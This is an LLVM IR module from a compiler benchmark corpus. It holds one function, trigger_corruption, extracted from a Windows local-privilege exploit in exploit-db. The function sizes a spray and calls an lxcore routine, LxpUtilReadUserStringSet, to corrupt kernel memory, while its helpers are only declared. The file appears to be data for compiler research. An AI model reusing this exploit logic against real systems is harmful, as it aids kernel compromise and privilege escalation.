; ModuleID = '/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_43962.c_trigger_corruption.c'
source_filename = "/home/carl/AnghaBench/exploitdb/exploits/windows/local/extr_43962.c_trigger_corruption.c"
target datalayout = "e-m:e-p270:32:32-p271:32:32-p272:64:64-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-unknown-linux-gnu"

@.str = private unnamed_addr constant [39 x i8] c"[*err*] unsupported spray_size == 0x%x\00", align 1
@.str.1 = private unnamed_addr constant [40 x i8] c"[*] trigger_corruption() returned 0x%x\0A\00", align 1

; Function Attrs: noinline nounwind optnone uwtable
define dso_local i32 @trigger_corruption(i32 %0) #0 {
  %2 = alloca i32, align 4
  %3 = alloca i32, align 4
  %4 = alloca i64, align 8
  %5 = alloca i64, align 8
  %6 = alloca i64, align 8
  %7 = alloca i32, align 4
  store i32 %0, i32* %3, align 4
  store i64 0, i64* %4, align 8
  %8 = load i32, i32* %3, align 4
  %9 = call i64 @get_size_factor(i32 %8, i64* %4)
  store i64 %9, i64* %5, align 8
  %10 = load i64, i64* %5, align 8
  %11 = icmp ult i64 %10, 0
  br i1 %11, label %12, label %15

12:                                               ; preds = %1
  %13 = load i32, i32* %3, align 4
  %14 = call i32 @printf(i8* getelementptr inbounds ([39 x i8], [39 x i8]* @.str, i64 0, i64 0), i32 %13)
  store i32 -1, i32* %2, align 4
  br label %25

15:                                               ; preds = %1
  %16 = load i64, i64* %5, align 8
  %17 = load i64, i64* %4, align 8
  %18 = call i64 @calc_stop_idx(i64 %16, i64 %17)
  store i64 %18, i64* %6, align 8
  %19 = load i64, i64* %4, align 8
  %20 = add i64 %19, 1
  %21 = load i64, i64* %6, align 8
  %22 = call i32 @call_LxpUtilReadUserStringSet(i64 %20, i32 1, i8 signext 79, i64 %21)
  store i32 %22, i32* %7, align 4
  %23 = load i32, i32* %7, align 4
  %24 = call i32 @printf(i8* getelementptr inbounds ([40 x i8], [40 x i8]* @.str.1, i64 0, i64 0), i32 %23)
  store i32 0, i32* %2, align 4
  br label %25

25:                                               ; preds = %15, %12
  %26 = load i32, i32* %2, align 4
  ret i32 %26
}

declare dso_local i64 @get_size_factor(i32, i64*) #1

declare dso_local i32 @printf(i8*, i32) #1

declare dso_local i64 @calc_stop_idx(i64, i64) #1

declare dso_local i32 @call_LxpUtilReadUserStringSet(i64, i32, i8 signext, i64) #1


!llvm.module.flags = !{!0}
!llvm.ident = !{!1}

!0 = !{i32 1, !"wchar_size", i32 4}
!1 = !{!"clang version 10.0.1 (https://github.com/wsmoses/llvm-project-tok c8e5003577614e72d6d18a216e6a09771e1fcce4)"}
